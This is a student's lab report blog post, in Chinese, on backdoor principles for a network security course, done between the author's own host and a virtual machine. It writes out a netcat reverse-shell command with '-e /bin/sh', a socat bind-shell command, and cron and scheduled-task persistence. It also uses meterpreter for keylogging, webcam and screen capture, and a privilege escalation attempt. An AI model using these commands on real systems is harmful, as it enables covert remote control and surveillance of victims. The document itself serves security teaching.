20145210姚思羽《网络对抗技术》后门原理与实践

20145210姚思羽《网络对抗技术》后门原理与实践

基础问题回答

1.例举你能想到的一个后门进入到你系统中的可能方式?

计算机安装的软件自己就带有后门,安装好这个软件之后后门就进入了计算机系统

2.例举你知道的后门如何启动起来(win及linux)的方式?

(1)定时启动。定好了启动的时间之后后门在特定时间自动启动

(2)在计算机开机之后启动

(3)在用户点击之后启动

3.Meterpreter有哪些给你映像深刻的功能?

(1)捕获用户的键盘输入信息

(2)得到被控制机器的网络接口还有IP地址

(3)下载被控机器的文件,安装病毒

(4)获取用户的密码

(5)控制摄像头

真是个可怕的小妖精...

4.如何发现自己的系统有没有被安装后门?

(1)检查系统启动项,观察可疑启动服务以及可疑路径

(2)在没有打开任何网络连接页面和防火墙的情况下监听本地开放端口,查看是否有本地IP连接外网IP的情况

实验过程记录

一、使用netcat获取主机操作Shell,cron启动

(一)windows获取linux的shell

1.查看主机IP为172.30.1.215

2.查看虚拟机的IP为192.168.19.129

3.主机在ncat文件目录下启动监听

4.虚拟机连接主机

5.我们就在windows下获得一个linux shell,可以运行linux的指令

6.因为linux中的指令是nc 172.30.1.215 5210 -e /bin/sh,所以我们可以在Windows下面运行linux的指令并获取信息,但是我们并不能进行通信,若想进行通信可在linux下输入指令nc 172.30.1.215 5210

(二)linux获取windows的shell

1.linux启动监听

2.Windows连接linux

3.我们可以在linux中看到提示

(三)启动cron

1.在linux中输入crontab -e命令来增加定时任务。这条定时任务就是在特定的时间主机和虚拟机会产生连接,在主机上会获得一个shell。我设定的是在每个小时的第35分钟可以进行连接

2.在第35分钟之前无法输入命令,等到35分钟时才可以输入命令

二、使用socat获取主机操作Shell, 任务计划启动

(一)使用socat获取主机操作Shell

1.在虚拟机中输入socat tcp-listen:5210 exec:bash,pty,stderr绑定连接

2.在win中输入socat readline tcp:192.168.19.129:5210进行反弹连接。连接成功,使用ls命令进行测试

(二)任务计划启动

1.打开计算机管理工具里的任务计划程序,创建一个新的任务

2.对触发器进行设定

3.对操作进行设定

4.启动任务,在虚拟机中连接主机,获得shell

三、使用MSF meterpreter生成可执行文件,利用ncat或socat传送到主机并运行获取主机Shell

1.在linux下生成后门程序

2.在linux下输入命令ncat.exe -lv 5210 > 5210.exe传输这个后门程序

3.在主机上接收这个后门程序

4.在linux下输入msfconsole进入msf

5.在虚拟机中设置LHOST为虚拟机IP,端口为5210,开启msf监听

6.在主机上运行刚刚接收的后门程序,linux获得win的shell,可对主机执行操作

四、使用MSF meterpreter生成获取目标主机音频、摄像头、击键记录等内容,并尝试提权

1.获取目标主机当前屏幕界面

2.获取键盘内容。keyscan_start为开始获取目标主机键盘输入内容,keyscan_dump为结束获取目的主机键盘内容,输入之后会显示键盘的输入内容

3.获取目标主机摄像头记录

4.在目标主机上安装系统服务

5.对目标主机进行提权,我这里win8没成功

实践总结

1.在启动cron这一步时我遇到了一点小问题,我的主机不能执行虚拟机上的命令,试了很多次都失败了,后来我才发现我计算机上的时间和正确的时间不一样,之前我一直按照正确的时间进行操作,然而在这一次我按照计算机上的时间操作就成功了

2.在任务计划启动那块一开始我创建完任务之后没有启动任务,导致虚拟机这边获取不到win的shell,将任务启动之后就顺利获得shell啦

实践过后觉得自己的计算机并不是百毒不侵的,要提高自己的安全防范意识,及时进行查杀和检查。

posted on 2017-03-15 22:26  20145210姚思羽  阅读(284)  评论(0编辑  收藏  举报

导航